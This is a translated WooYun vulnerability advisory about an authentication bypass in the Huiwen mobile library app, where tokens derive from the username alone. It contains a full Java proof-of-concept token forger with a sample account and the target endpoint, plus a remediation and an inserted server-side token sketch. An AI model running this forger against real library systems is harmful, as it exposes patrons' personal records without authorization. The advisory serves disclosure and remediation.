
Vulnerability summary

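Bug ID: wooyun-2014-084928

Title: Huiwen mobile library: user information can be obtained without a password

Vendor: libsys.com.cn

Author: 路人甲

Submitted: 2014-12-01 18:41

Fixed: 2015-03-01 18:42

Published: 2015-03-01 18:42

Vulnerability type: Unauthorized access / privilege bypass

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]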



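Vulnerability details

Disclosure status:

2014-12-01: Details reported to the vendor; awaiting vendor handling
2014-12-02: Vendor confirmed; details disclosed to the vendor only
2014-12-05: Details opened to third-party security partners
2015-01-26: Details disclosed to core white hats and experts in related fields
2015-02-05: Details disclosed to regular white hats
2015-02-15: Details disclosed to intern white hats
2015-03-01: Details disclosed to the public

Brief description:

The authentication token can be generated from the username alone, which is enough to obtain user information.

Detailed description:

The token used for authentication is generated on the client side, and the way it is generated does not depend on the password.
List of affected institutions: http://www.libsys.com.cn/huiwen_app_center_2.php

Proof of concept: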

    import java.io.UnsupportedEncodingException;
    import java.math.BigInteger;

    /**
     * Created by snail on 14-11-23.
     */
    public class LibToken {
        public static String makeToken(String s) {
            int k, l, i1, j1, k1;
            String s1, s2, s3, s4, s5;
            StringBuffer stringBuffer;
            byte abyte0[] = null;
            try {
                abyte0 = s.getBytes("utf-8");
            } catch (UnsupportedEncodingException e) {
                return null;
            }
            s1 = "";
            for (l = 0; l < abyte0.length; l++) {
                s2 = Integer.toHexString(0xff & abyte0[l]);
                if (s2.length() == 1) {
                    s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString();
                } else {
                    s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString();
                }
                // System.out.println(l+"-->s1-->"+s1+"s2-->"+s2);
            }
            //System.out.println("s1------>"+s1);
            s4 = s1.toUpperCase();
            stringBuffer = new StringBuffer("");
            for (i1 = 0; i1 < s4.length(); i1++) {
                stringBuffer.append(s4.charAt(i1));
                if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) {
                    stringBuffer.append((int) (10D * Math.random()));
                }
            }
            //System.out.println("stringBuffer.toString()--->"+stringBuffer.toString());
            s5 = b(stringBuffer.toString());
            //System.out.println("s5--->"+s5);
            j1 = 0;
            for (k = 0; k < s5.length(); k++) {
                j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString());
            }
            //System.out.println("j1---->"+j1);
            k1 = j1 % 36;
            if ((k1 <= 10) || (k1 == 16))
                k1 = 18;
            return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString();
        }

        public static String a(String s, int k) {
            // System.out.println("s--->"+s+"---k-->-"+k);
            BigInteger bigIntegerArray[] = new BigInteger[500];
            for (int l = 0; l < 100; l++) {
                bigIntegerArray[l] = new BigInteger("0");
            }
            BigInteger bi, bi1, bi2;
            bi = new BigInteger(s);
            bi1 = new BigInteger(String.valueOf(k));
            bi2 = bi;
            int i1;
            for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) {
                bigIntegerArray[i1] = bi2.mod(bi1);
                bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1);
            }
            for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) {
                BigInteger bi3 = bigIntegerArray[k1];
                bigIntegerArray[k1] = bigIntegerArray[j1];
                bigIntegerArray[j1] = bi3;
            }
            String s1 = "";
            for (int l1 = 0; l1 < i1; l1++) {
                s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString();
            }
            // System.out.println("s1-->"+s1);
            return s1;
        }

        public static String a(long l) {
            if (l < 10L) {
                //System.out.println("a00--->"+String.valueOf(l));
                return String.valueOf(l);
            }
            if (l < 36L) {
                //System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L))));
                return String.valueOf((char) (int) (65L + (l - 10L)));
            } else
                return "";
        }

        public static String b(String s) {
            BigInteger bi1 = new BigInteger(String.valueOf(16));
            BigInteger bi2 = new BigInteger("0");
            BigInteger bi3 = bi2;
            for (int k = 0; k < s.length(); k++) {
                char c1 = s.charAt(k);
                int m;
                if ((c1 >= '0') && (c1 <= '9')) {
                    m = Integer.parseInt(String.valueOf(c1));
                } else if ((c1 >= 'A') && (c1 <= 'Z')) {
                    m = 10 + (c1 - 'A');
                } else {
                    m = -1;
                }
                bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m))));
            }
            //System.out.println("bi3-->"+bi3.toString());
            return bi3.toString();
        }

        public static void main(String[] args){
            System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));
        }
    }


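The generated token is then used at:
http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx

Remediation:

Generate the token on the server side, or make token generation depend on the password.

Copyright notice: when reposting, please credit the source 路人甲@乌云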
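The remediation above (issue the token on the server, only after the password has been checked), sketched as an added example that is not code from the report or from the vendor. The function names, the `username|expiry` payload layout, the 15-minute lifetime and the sample account are all assumptions made for illustration.

```python
import base64, hashlib, hmac, os, time

SERVER_KEY = os.urandom(32)  # assumption: per-deployment secret, never shipped in the app
TOKEN_TTL = 900              # assumption: 15-minute token lifetime, in seconds

def _hash_pw(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Constructed sample account store: username -> (salt, password hash)
_salt = os.urandom(16)
USERS = {"reader001": (_salt, _hash_pw("correct horse", _salt))}

def _b64(raw):
    return base64.urlsafe_b64encode(raw).decode()

def issue_token(username, password, now=None):
    """Server side: return a token only if the password verifies, else None."""
    rec = USERS.get(username)
    salt, stored = rec if rec else (b"\0" * 16, b"")
    ok = hmac.compare_digest(_hash_pw(password, salt), stored)
    if not (rec and ok):
        return None
    expires = int(time.time() if now is None else now) + TOKEN_TTL
    payload = f"{username}|{expires}".encode()
    tag = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(tag)

def verify_token(token, now=None):
    """Server side: return the username for a valid, unexpired token, else None."""
    try:
        p64, t64 = token.split(".")
        payload = base64.urlsafe_b64decode(p64)
        tag = base64.urlsafe_b64decode(t64)
        username, expires = payload.decode().rsplit("|", 1)
        expires = int(expires)
    except (ValueError, UnicodeDecodeError):
        return None  # malformed token
    expected = hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # not signed with the server key: rejected
    if (time.time() if now is None else now) >= expires:
        return None  # expired
    return username
```

Because the tag depends on a key that exists only on the server, a client that knows nothing but the username cannot produce a token that verifies.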


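Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 9

Confirmed: 2014-12-02 10:08

Vendor reply:

Thank you, we will fix the vulnerability as soon as possible.

Latest status:

None


Vulnerability comments:

Comments

  1. 2015-03-26 17:10 | 动后河 (Intern white hat | Rank:51 Vulnerabilities:13 | ☭)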

    System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));